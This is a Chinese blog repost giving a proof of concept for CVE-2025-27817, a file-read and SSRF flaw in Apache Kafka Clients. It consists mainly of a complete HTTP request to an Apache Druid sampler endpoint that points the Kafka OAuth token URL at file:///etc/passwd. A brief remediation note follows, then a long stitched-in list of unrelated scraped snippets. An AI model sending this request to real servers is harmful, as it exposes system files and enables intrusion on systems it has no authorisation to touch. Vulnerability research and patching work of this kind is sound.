章鱼哥喜欢吹笛子
章鱼哥喜欢吹笛子

CVE-2025-27817 POC

Apache Kafka Clients 任意文件读取与 SSRF 漏洞

漏洞成因

该漏洞源于Apache Kafka Client在配置SASL/OAUTHBEARER连接时,对sasl.oauthbearer.token.endpoint.url和sasl.oauthbearer.jwks.endpoint.url参数的安全控制存在缺陷。攻击者可通过构造恶意URL参数,利用该缺陷实现任意文件读取或发起SSRF请求(访问非预期目标地址)。

影响范围

3.1.0 <= Apache Kafka <= 3.9.0

漏洞复现

读取 /etc/passwd

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Referer: http://your-ip:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json

{
  "type": "kafka",
  "spec": {
    "type": "kafka",
    "ioConfig": {
      "type": "kafka",
      "consumerProperties": {
        "bootstrap.servers": "127.0.0.1:6666",
        "sasl.mechanism": "OAUTHBEARER",
        "security.protocol": "SASL_SSL",
        "sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler",
        "sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
        "sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"
      },
      "topic": "test",
      "useEarliestOffset": true,
      "inputFormat": {
        "type": "regex",
        "pattern": "([\\s\\S]*)",
        "listDelimiter": "",
        "columns": ["raw"]
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {
        "column": "!!!_no_such_column_!!!",
        "missingValue": "1970-01-01T00:00:00Z"
      },
      "dimensionsSpec": {},
      "granularitySpec": {
        "rollup": false
      }
    },
    "tuningConfig": {
      "type": "kafka"
    }
  },
  "samplerConfig": {
    "numRows": 500,
    "timeoutMs": 15000
  }
}

修复建议

Standalone模式:修改connect-standalone.properties中的listeners或rest.host.name字段Distributed模式:修改connect-distributed.properties中的listeners或rest.host.name字段使用流量防护设备(如WAF、防火墙)拦截/connectors接口请求中携带敏感文件路径的恶意流量

你可能感兴趣的:(章鱼哥漏洞复现,web安全,网络安全)

  • 大胆的宣传自己 工匠良辰
    #大胆的宣传自己原创:辉哥奇谭辉哥奇谭今天有朋友问:辉哥,发现你最近很多次宣传「知识星球」…我回答:对我自己用心做的东西有信心。我的观点是:我们每个人要把自己当成一件产品,精心的打磨,大胆的推销。如果我们一辈子都不敢面对自己这件产品,也不好意思去推销,怎样才能实现自己内心的梦想?怎样才能获得自由?怎样才能过上自己想过的生活?人生在世也许就是七八十年光景,我们最终都会败在「时光」脚下。每个人来到这世
  • D2早课与活力链接 亲爱的lingling
    宇宙法则是:关注什么,什么就会变大。所以时刻关注自己在想什么,听什么,看什么!感恩今天早晨醒来的第一个意识是,真好,美好的一天开始了,我要越来越漂亮。起床做感恩冥想,呼吸法,喝一杯白开水,贴牛奶面膜。谢谢真我,感觉真好!感恩今天芳哥哥做的爱心早餐,给我煎了鸡蛋,谢谢芳哥的付出。谢谢!感恩我能够越来越清晰自己要做什么,越来越清楚知道自己想要的是什么,更加宁静与喜悦。今天早晨我听到我的高级智慧的声音,
  • 绕口令集合(每日练习) 蓉女侠
    八百标兵奔北坡,炮兵并排北边跑,炮兵怕把标兵碰,标兵怕碰炮兵炮。炮兵攻打八面坡,排排炮弹齐发射。步兵攻打八面坡,歼敌八千八百八十多。调到敌岛打特盗,特盗太刁投短刀,挡推顶打短刀掉,踏盗得刀盗打倒。哥挎瓜筐过宽沟,赶快过沟看怪狗,光看怪狗瓜筐扣,瓜滚筐空哥怪狗。一位爷爷他姓顾,上街打醋又买布。买了布,打了醋,回头看见鹰抓兔。放下布,搁下醋,上前去追鹰和兔。飞了鹰,跑了兔,打翻醋,醋湿布。牛郎恋刘娘,
  • 《每日邦哥说》第46说:真正拥有人格魅力的女性 人民剛
    内心强大的女人,总是很开朗,对于任何事情,都会一笑而过女人最大的底气,是对自己的自信,也是你的安全感一个女人最重要的是活出精彩自我,这样世界才会为你鼓掌猴小邦俱乐部|幸福小家、帮助大家、贡献国家,伙伴们大家好,欢迎收听每日邦哥说,我是邦哥。有一种女人,她们在感情里面容易失去自我,在生活中遇到困难,连还击的资格都没有,做人只能不断妥协,她们大多都没有太强的远见,往往只看到短期的得失。这种女人,其实往
  • 【数据分析】抓包工具的定义常见类型分类使用场景及注意事项
    抓包工具的定义常见类型分类使用场景及注意事项-CSDN直播抓包工具的定义常见类型分类使用场景及注意事项抓包工具的定义常见类型分类使用场景及注意事项抓包工具概述抓包工具顾名思义是一种用于捕获并分析网络数据包的软件或硬件工具它能够在数据传输过程中截取并记录网络流量让用户能够深入理解并排查网络问题这类工具的用途广泛从网络安全测试到应用程序调试都离不开抓包工具的帮助在众多的抓包工具中WiresharkFi
  • 月薪10000的人过着怎样的生活? 觉得不是很ok
    月薪10000对于初入职场的人来说是个不错的数字但现实中,月薪过万的职场人到底过着什么样的生活呢?我们不妨来算一笔账!下来是申请原创要求的三百字,头条哥p图到凌晨两点我容易吗容易吗容易吗容易吗容易吗容易吗易吗容易吗不容易接下来是申请原创要求的三百字,头条哥p图到凌晨两点我容易吗容易吗容易吗容易吗容易吗容易吗容易吗容易吗不容易接下来是申请原创要求的三百字,头条哥p图到凌晨两点我容易吗容易吗容易吗容易
  • 《跨域资源共享CORS的深层逻辑与前端实践精要》
    不同源头的资源交互已成为常态,而跨域资源共享(CORS)正是支撑这种交互的隐形架构。现代Web安全体系中平衡开放与防护的精妙设计。理解CORS的深层逻辑,不仅能解决实际开发中的跨域难题,更能触及网络安全与资源流通的核心矛盾,为前端工程师构建稳健的应用提供底层认知支撑。跨域资源共享的诞生,源于网络安全与应用发展的必然冲突。浏览器的同源策略,作为早期网络安全的基石,通过限制不同源文档的交互,有效阻挡了
  • 原因 雪凌悦读
    我的打卡中断十多天了,这几天总觉得有一件事没有做,睡觉都睡不安稳,今天重又回到小打卡,继续闯关。目前写作困扰我的事情有三个:第一,时间不够。暑假课开始了,每天早早起来做习题,做习题,实在是马不停蹄。但是回头想想每天回家后,我并没有把写作当作一回事来认真对待,而是在为自己找借口,未来十天,我要连续打卡,每天一篇,早日走到99关的终点。第二是浮躁。如鱼哥所说,写作没有达到预期,进步缓慢。我开始着急了,
  • 老师的梦想〈小蚊子的奇思妙想日记〉 柳梢晓月
    上课时,二哥突然转过头对我说:“老师现在面对着黑板写字,我要帮忙实现老师的梦想!”我对二哥说:“是什么梦想呢?”二哥连忙说:“这你都不知道?我在办公室里偷听了老师的对话!我们语文老师的梦想就是当一个霸气女王!我要帮她实现她的愿望,说不定可以免作业!”我想了想,可以免作业!我连忙赞同了二哥的想法,并等着二哥的好消息!二哥趁着语文老师正在面对黑板写板书,她连忙从鼻子里抠出七个体型大小刚刚好的卡哇伊葫芦
  • 中国顶级黑客名单 2501_92914741 facebooktwitterpaddle微信开放平台
    网名:KING真实名字:谭绪武OICQ:1576172简介:原中国黑客联盟站长,2001年中]=美黑客大战领军人物之一,中国第1代黑客之一,中国最早期黑客组织中国黑客联盟的创始人,中国黑客界泰斗级元老,中国传奇黑客。网名:sunx真实姓名:孙华OICQ:239670简介:资深网络安全专家、软件设计师、Unix专家,在黑客、病毒等技术上均具有顶尖级水平,对系统内核研究有很高的造诣,程序反编译、跟踪、
  • Centos7防火墙 会飞的灰大狼 Centos7linux
    Centos7防火墙前言:本来想在系统那里去说防火墙但防火墙要说的要很多使用单独做一章文章去讲防火墙~~‍在CentOS7中,防火墙是保障系统网络安全的核心组件,默认采用firewalld作为防火墙管理工具(替代了CentOS6的iptables服务),底层仍基于iptables内核模块实现规则控制。‍iptablesiptables命令的完整格式较为复杂,其核心结构由命令选项、表(table)、
  • 为了过个好年,我想当老师了 我想下雪
    我大哥在本地搞农产品之类,每天晚上要守几个小时,今天都没在奶奶家吃完晚饭,就走了。我二哥在长沙开店,跟我嫂子一起。08年刚刚生了一个宝宝,特别可爱。他们25回来了一趟,27早上就赶回了长沙。29晚上又回来,初四就要回长沙。在我奶奶家今天中午吃了一顿饭,就去了岳母家拜年。然后初四早上赶回长沙。我三哥在长沙开超市,26晚上回来了,吃了晚饭,27上午吃完早饭就回了长沙。29晚上回来,初二在奶奶家吃了午饭
  • 王丁益0611打卡情况【300/360】 王炜_cf15
    打卡日期:2019年/6月11/日体重:43kg身高:150cm打卡累计天数:300/360宣言:(用生命影响生命,陪伴孩子成长,构建和谐亲子关系)【加油,逗哥】孩子第四个90天目标:养成自己安排青蛙事项,番茄工作法进阶保证睡眠时长和定期运动,和好朋友分享如何用番茄工作法吃青蛙洗漱5分钟内完成,自己穿衣起床时间控制在5分钟内早上起床和晚上洗澡都使用计时工具,对自己的时间进行有效的把控*早睡21:0
  • 网络安全架构与网络拓扑的深度解析 火箭统 网络安全攻击面减少网络架构网络拓扑数据包转发
    背景简介网络安全是当前信息时代的核心挑战之一,随着网络技术的快速发展,攻击手段也日益多样化。本篇博客文章基于提供的书籍章节内容,深入分析网络安全中的攻击面减少策略、网络架构的设计与管理,以及不同网络拓扑的特点,旨在为读者提供一个全面的网络安全知识框架。攻击面减少攻击面是指一个系统或软件暴露给潜在攻击者的全部潜在入口点。减少攻击面是提高网络安全的有效手段之一。通过减少运行的代码量、限制未受信任用户的
  • 网络安全第14集 不灭锦鲤 web安全安全
    前言:小迪安全14集,这集重点内容:0、什么是js渗透测试?在javascript中也存在变量和函数,存在可控变量和函数就有可能存在在漏洞,js开发的web应用和php、java开发的区别是,js能看得到的源代码,php看不到,但是风险就是未授权访问、配置信息泄露(加密算法、key秘钥等),源代码看得到,存在更多的url泄露,从而可能会出现未授权访问,从url,前提:web应用可以采用前端语言或后
  • 与网络安全相比,为什么只会Python很难找到工作? 程序员羊羊 网安工程师网络安全黑客web安全python安全数据库网络开发语言学习
    前言作为一门广泛应用的编程语言,Python在众多领域中都有着不可忽视的地位。然而,对于那些寻求就业的程序员来说,仅仅掌握Python可能并不足以让他们轻松地找到一份理想的工作。本文将深入探讨为什么只会Python很难找到工作,以及分析在职程序员在Python岗位上可能会遇到的一些情况。一、Python的优势与局限性Python的优势Python作为一种高级编程语言,具有简洁、易读、易于学习等特点
  • 沿瑾+教练春哥+第三拆作业 sunny0902
    拆书帮长沙橘洲分舵第10期训练营第三拆作业~2020.03.18选自《亲密关系》P163-164【R•阅读原文片段】在沟通中当我们接收到他人的信息时,有两个重要的任务要完成。第一是要准确的理解对方话语所表达的意思,第二是要向对方传达关注和理解,让他知道我们对他的话是在意的。这两个任务都可以通过复述(paraphrasing)接受到的信息而完成。即用自己的话重复对方的意思,让信息传递着有机会肯定那就
  • 网络入门:防火墙、路由器、交换机三者到底有啥区别? wljslmz 网络技术防火墙路由器交换机
    你好,这里是网络技术联盟站,我是瑞哥。公众号后台有粉丝表示,自己是刚入行的网络从业者,每天接触防火墙、路由器、交换机,但是没有师傅跟他讲三者到底有啥区别,网上的文章一大堆,不知道哪个是对的哪个是错的,希望瑞哥能够出一篇文章详细介绍一下。在这里,非常感谢这位粉丝的信任!今天瑞哥如约分享,希望能够对这位朋友以及有相同需求的朋友有所帮助!目录:文章目录防火墙防火墙的功能和作用防火墙的类型防火墙的工作原理
  • 富二代都不敢做的事(2) 傅悦天
    李国豪一进到包间里,就看到朝他走来的孙观,对于这个经常拍他马屁的孙观,他还是挺喜欢的。“豪哥,今晚我就不喝酒了,现在有点醉了。”孙观笑着回应,同时清醒不少的他,假装喝醉,摇晃着身体。李国豪可不管那么多,走过去便勾住孙观的颈部,强拉着孙观坐在他旁边,并让随他而来的两位美女倒酒。“有兄弟,有美女,有好酒,这你都敢拒绝,是想不给我面子了吧?”李国豪虽然是笑嘻嘻的说的,但任谁都能听出这其中的命令口吻。“孙
  • 网络安全三要素 岁月静好2025 安全
    网络安全三要素1.保密性信息的保密性(Confidentiality)是网络安全的核心概念之一,它指的是确保信息只能被授权的用户访问,防止数据泄露给未授权的个人、系统或过程2。1.1保密性的核心含义限制访问:只有经过授权的用户才能查看或使用敏感信息。防止泄露:避免信息在传输、存储或处理过程中被窃取或监听。保护隐私:确保个人、企业或国家的隐私数据不被非法获取。1.3实现保密性的常见技术技术手段作用说
  • 代码审计与web安全选择题1 m0_74726609 代码审计网络安全
    软件供应链安全的基础是()A.完善的需求分析B.源代码安全C.渗透测试D.软件测试参考答案:B保证源代码安全的主要措施包括()A.开发工具和环境的安全B.代码安全C.渗透测试D.代码审计E.软件的说明文档完整参考答案:ABCD通过()技术,实现源代码在终端、网络及服务器存储场景下全周期的安全管理,防止内部代码有意、无意泄露、扩散出去。A.数据加B.数据脱C.数据安全隔离D.防火墙参考答案:C软件供
  • 此时此刻 躺在被窝里他 认真的孩子
    下班了回家了想快些洗个澡躺在床上你突然想起来还有工作没有弄完,你拿起手机点进通讯录从床上做了起来换了一个端正些的坐姿。电话已经拨了出去:哥(他的老板)我那个还有些没弄好能等我这事弄完了后再去弄吧。没事你先去吧,耳边传来的低沉的声音。他明天就要去离婚了这是他正在心烦的事,记得他们刚认识的时候两人总觉得认为这世界把最美好的都给了他们她下班时他去接她两个人一起健身一起读书拿着存了好久的钱一起旅行甚至一起
  • 我们都想做最突出的腰间盘,最后却只剩下了腰间盘突出 十二读书会
    我们都想做最突出的腰间盘,最后却只剩下了腰间盘突出今天这个故事的故事的主人公是我非常好的朋友——F哥故事发生在两周前上一秒,我还躺在床上刷着抖音,笑得人仰马翻叮叮叮叮叮~下一秒,突然的微信视频请求,导致手机由于震动受到重力作用加大而加速下落直到砸在我脸上,瞬间把我拉回现实世界——发送视频请求的是一位已经许久未曾联系的老友,F哥。F哥是一位实实在在的大美女,但由于稍年长我,我们又都敬她是条汉子,故爱
  • 鬼影重重 第八章 误会 王室蚊子
    “嗨,子柔,早上好!”“额,龙云,你什么时候来的?”“没多久!”“哎,是哦,不久,也就一个多小时吧!”一个不合时宜的声音响起。武龙云看着突然出现的女孩,是昨晚打搅自己好事的瑶瑶,这让他对她没什么好感。“嗨!龙哥,我叫楚梦瑶,你可以叫我瑶瑶,柔柔死党闺蜜!”“嗨,你好!”武龙云本不想搭理她,但那声龙哥叫的他很舒服,伸手不打笑脸人,况且看着她俩环着胳膊出来,关系肯定不错,少一个穿小鞋的,少一份麻烦,看
  • 运维-资产梳理
    资产梳理一、明确目标与范围1.1、确定梳理目的网络安全:缩小攻击面、识别风险点。资源配置:优化资源利用率、降低成本。合规要求:满足法律法规或行业标准(如等保、ISO27001)。1.2、界定资产范围物理资产:服务器、网络设备、终端设备、IoT设备等。数字资产:操作系统、数据库、应用程序、域名、IP地址、云资源、容器/K8s集群、SaaS应用。数据资产:敏感数据(如客户信息、财务数据)、业务数据、备
  • 疯狂小杨哥推荐的产品可以代理吗?如何代理三只羊的产品? 浮沉导师
    在这个瞬息万变的时代,数字化和平台化如同汹涌澎湃的浪潮,推动着经济不断前行,内容电商则如璀璨星辰,与各行各业深度交融,为社会民生注入强大动力。想代理疯狂小杨哥三只羊产品,其实只羊加入微易购-小二郎,即可免费分享这些产品赚佣金。方法我放在最后了。疯狂小杨哥和三只羊,以优质内容为羽翼,秉持着“有家的地方有工作”的使命,翱翔在时代的天空。众小二-微易购小程序的诞生,不仅是这一使命的延伸,更是为众多渴望改
  • AI+MCP智能研判系统架构
    AI+MCP智能研判系统架构1.系统概述1.1核心理念AI+MCP智能研判系统是一个创新的网络安全分析平台,通过将大语言模型(LLM)的智能理解能力与MCP(ModelContextProtocol)协议的标准化工具调用能力相结合,实现了"自然语言提问→AI智能理解→MCP工具调用→AI深度研判→智能结果输出"的完整闭环。1.2技术创新点智能意图识别:基于LLM的自然语言理解,自动解析用户查询意图
  • 真的骗局!龙祥辉龙哥祥汇决赛预备群CTB慈善助力骗局曝光!受害者亲身讲述无法提现内幕! 正义青天
    网上交友,相谈甚欢,“祥汇联社龙哥”(假冒)毫不吝啬的给你分享赚钱的门道,带你进行项目投资承诺稳赚不赔,你以为遇到了“理财大师”,准备跟着“大赚一笔”走上人生巅峰的时候,其实你已经陷入骗子设下的圈套,群里面200多个人,全部是托,他们能给你一个聊天号,为什么他们自己就不能再创立200多个虚拟号,放在群里,鱼龙混杂掩人耳目的欺骗你!你看到别人的充值截图也好,买黄金的发票和实物也罢,都是骗子精心准备的
  • Claude 4 全新上线,科研和写作能力大幅提升!文献检索和综述更容易,实测好用!(附专业提示词) 智写AI AI学术写作指南人工智能
    在2025年5月22日,Claude正式发布了它的4系列模型:Opus4和Sonnet4七哥总结下这两款模型的特点,Sonnet4适合快速响应的任务,Opus4适合需要推理的复杂多步骤任务。两款模型都有20万token的上下文窗口。对科研人员、程序开发者来说,Claude这一代模型不仅性能强悍,还在多项核心能力上实现了突破式进阶。说说最新亮相的Claude4系列模型在多项核心能力上的三大进阶之处:
  • 成功日记(Day554) 狮子座的兔子姑娘
    1、跟老师出诊。~4h。2、把名字打到电脑里。~1h。3、和z鹤有一搭没一搭的闲聊。~0.5h。4、和小伙伴们一起打太极,闲聊。~1.5h。5、跟小王哥微信聊天。~0.5h。心情:还挺好的。每天的生活简单、纯粹,没有过多的杂念,还是比较开心的。
  • Java实现的简单双向Map,支持重复Value superlxw1234 java双向map
    关键字:Java双向Map、DualHashBidiMap     有个需求,需要根据即时修改Map结构中的Value值,比如,将Map中所有value=V1的记录改成value=V2,key保持不变。   数据量比较大,遍历Map性能太差,这就需要根据Value先找到Key,然后去修改。   即:既要根据Key找Value,又要根据Value
  • PL/SQL触发器基础及例子 百合不是茶 oracle数据库触发器PL/SQL编程
      触发器的简介; 触发器的定义就是说某个条件成立的时候,触发器里面所定义的语句就会被自动的执行。因此触发器不需要人为的去调用,也不能调用。触发器和过程函数类似 过程函数必须要调用,   一个表中最多只能有12个触发器类型的,触发器和过程函数相似 触发器不需要调用直接执行, 触发时间:指明触发器何时执行,该值可取: before:表示在数据库动作之前触发
  • [时空与探索]穿越时空的一些问题 comsci 问题
          我们还没有进行过任何数学形式上的证明,仅仅是一个猜想.....       这个猜想就是; 任何有质量的物体(哪怕只有一微克)都不可能穿越时空,该物体强行穿越时空的时候,物体的质量会与时空粒子产生反应,物体会变成暗物质,也就是说,任何物体穿越时空会变成暗物质..(暗物质就我的理
  • easy ui datagrid上移下移一行 商人shang js上移下移easyuidatagrid
    /** * 向上移动一行 * * @param dg * @param row */ function moveupRow(dg, row) { var datagrid = $(dg); var index = datagrid.datagrid("getRowIndex", row); if (isFirstRow(dg, row)) {
  • Java反射 oloz 反射
    本人菜鸟,今天恰好有时间,写写博客,总结复习一下java反射方面的知识,欢迎大家探讨交流学习指教 首先看看java中的Class package demo; public class ClassTest { /*先了解java中的Class*/ public static void main(String[] args) { //任何一个类都
  • springMVC 使用JSR-303 Validation验证 杨白白 springmvc
    JSR-303是一个数据验证的规范,但是spring并没有对其进行实现,Hibernate Validator是实现了这一规范的,通过此这个实现来讲SpringMVC对JSR-303的支持。 JSR-303的校验是基于注解的,首先要把这些注解标记在需要验证的实体类的属性上或是其对应的get方法上。 登录需要验证类 public class Login { @NotEmpty
  • log4j 香水浓 log4j
    log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, HTML, DATABASE #log4j.rootCategory=DEBUG, STDOUT, DAILYFILE, ROLLINGFILE, HTML #console log4j.appender.STDOUT=org.apache.log4j.ConsoleAppender log4
  • 使用ajax和history.pushState无刷新改变页面URL agevs jquery框架Ajaxhtml5chrome
    表现 如果你使用chrome或者firefox等浏览器访问本博客、github.com、plus.google.com等网站时,细心的你会发现页面之间的点击是通过ajax异步请求的,同时页面的URL发生了了改变。并且能够很好的支持浏览器前进和后退。 是什么有这么强大的功能呢? HTML5里引用了新的API,history.pushState和history.replaceState,就是通过
  • centos中文乱码 AILIKES centosOSssh
    一、CentOS系统访问 g.cn ,发现中文乱码。 于是用以前的方式:yum -y install fonts-chinese CentOS系统安装后,还是不能显示中文字体。我使用 gedit 编辑源码,其中文注释也为乱码。       后来,终于找到以下方法可以解决,需要两个中文支持的包: fonts-chinese-3.02-12.
  • 触发器 baalwolf 触发器
    触发器(trigger):监视某种情况,并触发某种操作。 触发器创建语法四要素:1.监视地点(table) 2.监视事件(insert/update/delete) 3.触发时间(after/before) 4.触发事件(insert/update/delete) 语法: create trigger triggerName after/before 
  • JS正则表达式的i m g bijian1013 JavaScript正则表达式
            g:表示全局(global)模式,即模式将被应用于所有字符串,而非在发现第一个匹配项时立即停止。         i:表示不区分大小写(case-insensitive)模式,即在确定匹配项时忽略模式与字符串的大小写。         m:表示
  • HTML5模式和Hashbang模式 bijian1013 JavaScriptAngularJSHashbang模式HTML5模式
            我们可以用$locationProvider来配置$location服务(可以采用注入的方式,就像AngularJS中其他所有东西一样)。这里provider的两个参数很有意思,介绍如下。 html5Mode         一个布尔值,标识$location服务是否运行在HTML5模式下。 ha
  • [Maven学习笔记六]Maven生命周期 bit1129 maven
    从mvn test的输出开始说起   当我们在user-core中执行mvn test时,执行的输出如下:   /software/devsoftware/jdk1.7.0_55/bin/java -Dmaven.home=/software/devsoftware/apache-maven-3.2.1 -Dclassworlds.conf=/software/devs
  • 【Hadoop七】基于Yarn的Hadoop Map Reduce容错 bit1129 hadoop
    运行于Yarn的Map Reduce作业,可能发生失败的点包括 Task Failure Application Master Failure Node Manager Failure Resource Manager Failure 1. Task Failure 任务执行过程中产生的异常和JVM的意外终止会汇报给Application Master。僵死的任务也会被A
  • 记一次数据推送的异常解决端口解决 ronin47 记一次数据推送的异常解决
       需求:从db获取数据然后推送到B         程序开发完成,上jboss,刚开始报了很多错,逐一解决,可最后显示连接不到数据库。机房的同事说可以ping 通。     自已画了个图,逐一排除,把linux 防火墙 和 setenforce 设置最低。    service iptables stop
  • 巧用视错觉-UI更有趣 brotherlamp UIui视频ui教程ui自学ui资料
    我们每个人在生活中都曾感受过视错觉(optical illusion)的魅力。 视错觉现象是双眼跟我们开的一个玩笑,而我们往往还心甘情愿地接受我们看到的假象。其实不止如此,视觉错现象的背后还有一个重要的科学原理——格式塔原理。 格式塔原理解释了人们如何以视觉方式感觉物体,以及图像的结构,视角,大小等要素是如何影响我们的视觉的。 在下面这篇文章中,我们首先会简单介绍一下格式塔原理中的基本概念,
  • 线段树-poj1177-N个矩形求边长(离散化+扫描线) bylijinnan 数据结构算法线段树
    package com.ljn.base; import java.util.Arrays; import java.util.Comparator; import java.util.Set; import java.util.TreeSet; /** * POJ 1177 (线段树+离散化+扫描线),题目链接为http://poj.org/problem?id=1177
  • HTTP协议详解 chicony http协议
    引言                                 
  • Scala设计模式 chenchao051 设计模式scala
    Scala设计模式                我的话: 在国外网站上看到一篇文章,里面详细描述了很多设计模式,并且用Java及Scala两种语言描述,清晰的让我们看到各种常规的设计模式,在Scala中是如何在语言特性层面直接支持的。基于文章很nice,我利用今天的空闲时间将其翻译,希望大家能一起学习,讨论。翻译
  • 安装mysql daizj mysql安装
    安装mysql   (1)删除linux上已经安装的mysql相关库信息。rpm  -e  xxxxxxx   --nodeps (强制删除)      执行命令rpm -qa |grep mysql 检查是否删除干净   (2)执行命令  rpm -i MySQL-server-5.5.31-2.el
  • HTTP状态码大全 dcj3sjt126com http状态码
    完整的 HTTP 1.1规范说明书来自于RFC 2616,你可以在http://www.talentdigger.cn/home/link.php?url=d3d3LnJmYy1lZGl0b3Iub3JnLw%3D%3D在线查阅。HTTP 1.1的状态码被标记为新特性,因为许多浏览器只支持 HTTP 1.0。你应只把状态码发送给支持 HTTP 1.1的客户端,支持协议版本可以通过调用request
  • asihttprequest上传图片 dcj3sjt126com ASIHTTPRequest
    NSURL *url =@"yourURL"; ASIFormDataRequest*currentRequest =[ASIFormDataRequest requestWithURL:url]; [currentRequest setPostFormat:ASIMultipartFormDataPostFormat];[currentRequest se
  • C语言中,关键字static的作用 e200702084 C++cC#
    在C语言中,关键字static有三个明显的作用: 1)在函数体,局部的static变量。生存期为程序的整个生命周期,(它存活多长时间);作用域却在函数体内(它在什么地方能被访问(空间))。 一个被声明为静态的变量在这一函数被调用过程中维持其值不变。因为它分配在静态存储区,函数调用结束后并不释放单元,但是在其它的作用域的无法访问。当再次调用这个函数时,这个局部的静态变量还存活,而且用在它的访
  • win7/8使用curl geeksun win7
    1.  WIN7/8下要使用curl,需要下载curl-7.20.0-win64-ssl-sspi.zip和Win64OpenSSL_Light-1_0_2d.exe。 下载地址:  http://curl.haxx.se/download.html 请选择不带SSL的版本,否则还需要安装SSL的支持包   2.  可以给Windows增加c
  • Creating a Shared Repository; Users Sharing The Repository hongtoushizi git
    转载自:   http://www.gitguys.com/topics/creating-a-shared-repository-users-sharing-the-repository/ Commands discussed in this section: git init –bare git clone git remote git pull git p
  • Java实现字符串反转的8种或9种方法 Josh_Persistence 异或反转递归反转二分交换反转java字符串反转栈反转
    注:对于第7种使用异或的方式来实现字符串的反转,如果不太看得明白的,可以参照另一篇博客: http://josh-persistence.iteye.com/blog/2205768   /** * */ package com.wsheng.aggregator.algorithm.string; import java.util.Stack; /**
  • 代码实现任意容量倒水问题 home198979 PHP算法倒水
    形象化设计模式实战             HELLO!架构                     redis命令源码解析   倒水问题:有两个杯子,一个A升,一个B升,水有无限多,现要求利用这两杯子装C
  • Druid datasource zhb8015 druid
    推荐大家使用数据库连接池 DruidDataSource. http://code.alibabatech.com/wiki/display/Druid/DruidDataSource DruidDataSource经过阿里巴巴数百个应用一年多生产环境运行验证,稳定可靠。 它最重要的特点是:监控、扩展和性能。 下载和Maven配置看这里: http
  • 两种启动监听器ApplicationListener和ServletContextListener spjich javaspring框架
    引言:有时候需要在项目初始化的时候进行一系列工作,比如初始化一个线程池,初始化配置文件,初始化缓存等等,这时候就需要用到启动监听器,下面分别介绍一下两种常用的项目启动监听器   ServletContextListener  特点: 依赖于sevlet容器,需要配置web.xml 使用方法: public class StartListener implements
  • JavaScript Rounding Methods of the Math object 何不笑 JavaScriptMath
        The next group of methods has to do with rounding decimal values into integers. Three methods — Math.ceil(),  Math.floor(), and  Math.round() — handle rounding in differen
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他